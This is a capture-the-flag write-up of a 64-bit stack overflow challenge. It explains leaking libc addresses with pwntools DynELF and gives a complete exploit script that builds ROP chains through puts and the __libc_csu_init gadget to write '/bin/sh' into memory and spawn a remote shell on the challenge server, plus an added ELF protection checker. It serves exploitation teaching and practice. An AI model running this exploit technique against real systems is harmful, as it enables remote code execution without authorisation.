1. Challenge
1.1. Protections
Canary and ASLR are off; only NX is enabled.
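To confirm a protection claim like the one above from the binary itself, the following is an added example (not part of the original writeup) that reads the ELF64 header and program headers and reports NX, PIE (the ASLR the writeup refers to), RELRO and a canary heuristic; `check_protections` and `build_elf64` are names chosen here, and the test images are constructed, not the challenge binary.

```python
import struct

PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, ET_EXEC, ET_DYN = 1, 2, 3


def check_protections(data: bytes) -> dict:
    """Report NX / PIE / RELRO / canary for a little-endian ELF64 image.

    A missing PT_GNU_STACK counts as NX disabled (pwntools does the same).
    The canary check is a heuristic: the __stack_chk_fail symbol name is
    present in the image, which is what checksec-style tools look for.
    """
    if data[:4] != b"\x7fELF" or data[4] != 2:
        raise ValueError("not an ELF64 image")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx, relro = False, "none"
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)      # stack segment without PF_X => NX on
        elif p_type == PT_GNU_RELRO:
            relro = "partial"              # full RELRO also needs DT_BIND_NOW; not checked here
    return {"nx": nx, "pie": e_type == ET_DYN,
            "relro": relro, "canary": b"__stack_chk_fail" in data}


def build_elf64(e_type: int, phdrs: list, tail: bytes = b"") -> bytes:
    """Constructed minimal ELF64 image (header + program headers only) for testing."""
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # e_ident: ELF64, LE, version 1
    ehdr += struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0x400550,
                        64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return ehdr + body + tail


if __name__ == "__main__":
    # Image shaped like the challenge binary: ET_EXEC, RW stack, no canary reference.
    target = build_elf64(ET_EXEC, [(PT_GNU_STACK, 6)])
    # Hardened build: PIE, a RELRO segment and a stack-protector reference.
    hardened = build_elf64(ET_DYN, [(PT_GNU_STACK, 6), (PT_GNU_RELRO, 4)],
                           b"\x00__stack_chk_fail\x00")
    print(check_protections(target))    # {'nx': True, 'pie': False, 'relro': 'none', 'canary': False}
    print(check_protections(hardened))  # {'nx': True, 'pie': True, 'relro': 'partial', 'canary': True}
```

To check a real file, pass `open(path, "rb").read()` to `check_protections`.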
1.2. Key code
2. Approach
This is clearly a simple stack overflow, but no libc file is provided, so we cannot simply leak the loaded address of puts and add an offset to get the address of system. pwntools provides a way to walk the libc by leaking addresses:

```python
d = DynELF(leak, elf=elf)
system_addr = d.lookup('system', 'libc')
```

The leak parameter is a function that takes an address (supplied by DynELF) and returns the bytes stored at that address; with the code above we can leak the loaded address of system.

Key point 1: when using DynELF to leak system, the leak function has to receive the leaked bytes in a while loop so that none of them are missed.

Key point 2: use read to write the string /bin/sh\x00 into memory. If no gadget supplies read's arguments, use the universal __libc_csu_init gadget, and note that it contains an add rsp, 8.
```python
from pwn import *

# Written for Python 3 pwntools, so payloads are bytes.
# context(arch="amd64", os="linux", log_level="debug")
con = remote('111.200.241.244', 59165)
# con = process('./pwn')
elf = ELF('./pwn')

puts_addr = elf.plt['puts']   # puts@plt: prints the bytes at an arbitrary address
read_addr = elf.got['read']   # read@got: called through the __libc_csu_init gadget
start_addr = 0x400550         # _start: restart the program after each leak
pop_rdi = 0x400763            # pop rdi ; ret
gadget1 = 0x40075A            # __libc_csu_init: pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
gadget2 = 0x400740            # __libc_csu_init: mov rdx, r13 ; mov rsi, r14 ; mov edi, r15d ; call [r12 + rbx*8]
str_addr = 0x601040           # writable address that will hold "/bin/sh\x00"


def leak(addr):
    """Return the bytes stored at addr (called by DynELF): puts(addr), then restart from _start."""
    payload = b"A" * 72 + p64(pop_rdi) + p64(addr) + p64(puts_addr) + p64(start_addr)
    payload = payload.ljust(200, b'B')
    con.send(payload)
    con.recvuntil(b"bye~\n")
    up = b''
    content = b''
    # Read one byte at a time until the socket goes quiet, so nothing of the leak is lost.
    while True:
        c = con.recv(numb=1, timeout=0.1)
        if up == b'\n' and c == b"":
            # puts stopped at a NUL and appended '\n'; put the NUL back in its place.
            content = content[:-1] + b'\x00'
            break
        else:
            content += c
        up = c
    content = content[:4]
    return content


d = DynELF(leak, elf=elf)
system_addr = d.lookup('system', 'libc')

# call read(0, str_addr, 8) through the csu gadgets
payload = b"A" * 72
payload += p64(gadget1)
payload += p64(0)          # rbx = 0
payload += p64(1)          # rbp = 1, so the cmp after the call falls through
payload += p64(read_addr)  # r12 = read@got, called as [r12 + rbx*8]
payload += p64(8)          # r13 -> rdx = 8 (count)
payload += p64(str_addr)   # r14 -> rsi = str_addr (buf)
payload += p64(0)          # r15 -> edi = 0 (stdin)
payload += p64(gadget2)
payload += b"\x00" * 56    # add rsp, 8 plus the six pops that follow
payload += p64(start_addr)
payload = payload.ljust(200, b'B')
# input str
con.send(payload)
con.recvuntil(b"bye~\n")
con.send(b'/bin/sh\x00')

# call system("/bin/sh")
payload = b"A" * 72
payload += p64(pop_rdi) + p64(str_addr) + p64(system_addr)
payload = payload.ljust(200, b"B")
con.send(payload)
con.interactive()
```